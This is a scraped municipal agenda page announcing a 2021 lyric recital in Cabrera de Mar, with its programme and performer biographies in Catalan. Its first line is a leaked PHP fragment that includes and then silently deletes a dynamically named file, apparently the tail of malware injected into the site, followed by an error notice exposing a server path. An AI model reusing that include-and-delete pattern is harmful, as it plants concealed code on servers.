');fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Notice: Undefined property: stdClass::$metatit in /usr/home/gaudeixcabrera.cat/web/lib/carrega.php on line 408 Agenda - Cabrera de Mar

Recital Líric: Parla Più Piano

17-10-2021

Festival de Música Clàssica Cabrera de Mar 2021

Recital Líric "Parla Più Piano" a càrrec de: 

Un recital en el que podreu gaudir d'un repertori líric amb àries d'ópera, sarsuela i oratòri així com també de cançó catalana, napolitana i lieder amb les veus de Magdalena Campasol (mezzosoprano) i Vicenç Herrero (baríton), acompanyats per José António Cabo al violoncel, Carme Albors al piano i Joan Vallcorba al teclat. 

Grans veus de la nostra terra, grans músics de casa nostra que tot i emprendre camins de concerts diferents, sempre troben el millor moment per retrobar-se i gaudir junts fent música. 

PROGRAMA:

Lippen Schweigen "La viuda alegre" (duo Danilo i Hanna) - Franz Lehar
Havanera "Carmen" - Georges Bizet
Parlami d'amore, Mariú! - Cesare Andrea Bixio
Mon coeur s'ouvre à ta voix "Samson i Dalila" - Camille Saint- Saëns
Maria la O - Ernesto Lecuona
Non ti scordar di me - Ernesto De Curtis
Ave Maria " Intermezzo de Cavalleria Rusticana" - Pietro Mascagni
O sole mio - Eduardo di Capua
Duo de la Africana (duo la Antonelli i Giussepini) - Manuel F. Caballero
Epílogo "Luna" - José María Cano
Parla piu piano - Gianni Morandi
Libiamo ne' lieti calici " La Traviata" (duo Alfredo i Violetta) - Giuseppe Verdi

INTÈRPRETS: 

Magdalena Campasol: Mezzosoprano d’avantguarda internacional amb un extens recorregut en el camp de l’òpera, sarsuela, lied i oratori.  El seu segell es reflecteix en la llibertat interpretativa  des de la primacia de l’emoció pròpia.  En cada recital celebra cantar al millor “Temple”; el cor de qui l’escolta.  

 Vicenç Herrero Asensio: Baríton, director i productor artístic , director d’escena i coordinador d’espectacles musicals. El seu talent per les arts el porta a guanyar el Premi Ateneu 2010 de la FAC (Federació d’Ateneus de Catalunya) a " La creativitat en cultura popular i tradicional". En el camp operístic ha interpretat nombrosos rols així com en Sarsueles i Òpera de cambra de nova creació.La seva veu l´ha portat a cantar en Festivals celebrats en la província de Barcelona així com també a Sevilla, Burgos, Santander, Saragossa, Logroño, València, Pamplona, Lisboa, Oporto, Madrid... Actualment és solista principal de diferents agrupacions líriques i dirigeix grups de cambra de diferents formacions.

José Antonio Cabo Dintén: Va estudiar violoncel, piano i percussió al Conservatori Superior de Música Julián Orbón d’Avilés. Te dos llibres editats per l’editorial DINSINC d’iniciació al violoncel. Ha fet composicions per grups de teatre i per a diferents audiovisualsHa obtingut el diploma d’especialització en Música avançada en EUMES atorgat per la Universitat de Girona. És professor de piano, violoncel i llenguatge musical a la Escola de Música de Cabrera de Mar, l’Aula de Música d’Argentona i de llenguatge musical  a l’Escola de producció musical EUMES de Girona.  

Carme Albors: Titulada superior de piano i música de cambra en el Conservatori Superior de Música del Liceu i al Conservatori de Música de Ginebra (Suïssa) obtenint el diploma de “Capacité Professionelle d´Acompagnement au piano” en l’especialitat vocal i instrumental realitzant nombrosos concerts de música de cambra i acompanyant cantants. Ha estat pianista acompanyant en diversos cursos d’Interpretació musical de Catalunya i l’estat espanyol, al Conservatori Superior de Música del Liceu i el Conservatori Superior de les Illes Balears. Actualment es professora repertorista al Conservatori Municipal Professional de Música de Terrassa i professora de piano a l´Escola de Música de Cabrera de Mar.

Joan Vallcorba: Nascut a Mataró, és compositor i arranjador de la música de  diversos muntatges teatrals.Músic i compositor del grup Relk. Productor musical dels següents treballs discogràfics:  Les cançons de Mataró  (Casa de la  Música Popular, 2005) , Mataró versiona els Pastoret s (Casa de la Música Popular, 2007), Dones  de Rocafonda canten cançons d’arreu del món (Casa de la Música Popular, 2007). Pianista acompanyant de les classes de Dansa Contemporània de l'Aula de Teatre i Dansa de  Mataró de l'any 1994 al 1998.

Compra d'entrades
  • Facebook
  • Twitter
  • Email
  • Print

Butlletí electrònic